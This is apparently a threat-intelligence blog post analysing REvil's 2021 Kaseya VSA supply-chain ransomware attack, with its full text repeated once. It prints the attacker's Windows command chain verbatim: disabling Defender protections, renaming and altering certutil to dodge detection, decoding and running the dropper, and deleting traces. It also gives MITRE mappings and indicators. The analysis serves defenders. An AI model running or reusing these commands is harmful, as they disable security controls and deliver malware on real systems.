🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Proactively monitor and defend against malware with CloudSEK XVigil Malware Logs module, ensuring the integrity of your digital assets
Schedule a DemoOn 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.
Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”
The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The following command is used to delay or disable the execution of PowerShell commands:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreferenceÂ
These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.
The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”:Â
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:
echo %RANDOM% >> C:\Windows\cert.exe
The next command decodes the “agent.crt” file to “agent.exe”:
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exeÂ
Followed by which, this command line cleans up the file and executes “agent.exe”:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Agent.exe is a dropper that downloads the following artifacts:
Artifacts | Description |
MsMpEng.exe | Windows Defender component signed by Microsoft |
Mpsvc.dll | Part of MsMpEng.exe |
REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.
A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.
Initial Access | T1059.002 Supply Chain Compromise: Compromise Software Supply Chain |
Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
Persistence & Privilege Escalation | T1574.002 Hijack Execution Flow: DLL Side-Loading |
Defence Evasion | T1036.003 Masquerading: Rename System Utilities |
T1562.001 Impair Defenses: Disable or Modify Tools | |
T1140 Deobfuscate/Decode Files or Information | |
T1574.002 Hijack Execution Flow: DLL Side-Loading | |
T1070.004 Indicator Removal on Host: File Deletion | |
T112 Modify Registry | |
T1553.002 Subvert Trust Controls: Code Signing | |
Impact | T1486 Data Encrypted for Impact |
Files | C:\kworking\agent.exe (REvil Dropper) |
Type | Indicator |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C:\Windows\cert.exe |
|
(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe) |
|
(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.) |
Domains | https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt |
YARA Rules | https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules |
Registry Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter |
References
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
Discover how to navigate and protect against Dark Web threats. Learn about cyber risks, real-time monitoring, and securing your digital presence.
On 23 October 2023, CloudSEK’s Threat Intelligence Team detected a Ransomware-as-a-Service (RaaS) group, named QBit introducing a newly developed ransomware written in Go, boasting advanced features to optimize its malicious operations.
Cyclops, now renamed as Knight also known as Cyclops 2.0, debuted in May 2023. The Cyclops group has successfully developed ransomware that can infect all three major platforms: Windows, Linux, macOS, ESXi and Android.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
min read
Kaseya VSA Supply Chain Ransomware Incident
On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.
Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”
The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The following command is used to delay or disable the execution of PowerShell commands:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreferenceÂ
These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.
The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”:Â
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:
echo %RANDOM% >> C:\Windows\cert.exe
The next command decodes the “agent.crt” file to “agent.exe”:
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exeÂ
Followed by which, this command line cleans up the file and executes “agent.exe”:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Agent.exe is a dropper that downloads the following artifacts:
Artifacts | Description |
MsMpEng.exe | Windows Defender component signed by Microsoft |
Mpsvc.dll | Part of MsMpEng.exe |
REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.
A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.
Initial Access | T1059.002 Supply Chain Compromise: Compromise Software Supply Chain |
Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
Persistence & Privilege Escalation | T1574.002 Hijack Execution Flow: DLL Side-Loading |
Defence Evasion | T1036.003 Masquerading: Rename System Utilities |
T1562.001 Impair Defenses: Disable or Modify Tools | |
T1140 Deobfuscate/Decode Files or Information | |
T1574.002 Hijack Execution Flow: DLL Side-Loading | |
T1070.004 Indicator Removal on Host: File Deletion | |
T112 Modify Registry | |
T1553.002 Subvert Trust Controls: Code Signing | |
Impact | T1486 Data Encrypted for Impact |
Files | C:\kworking\agent.exe (REvil Dropper) |
Type | Indicator |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C:\Windows\cert.exe |
|
(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe) |
|
(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.) |
Domains | https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt |
YARA Rules | https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules |
Registry Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter |
References
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/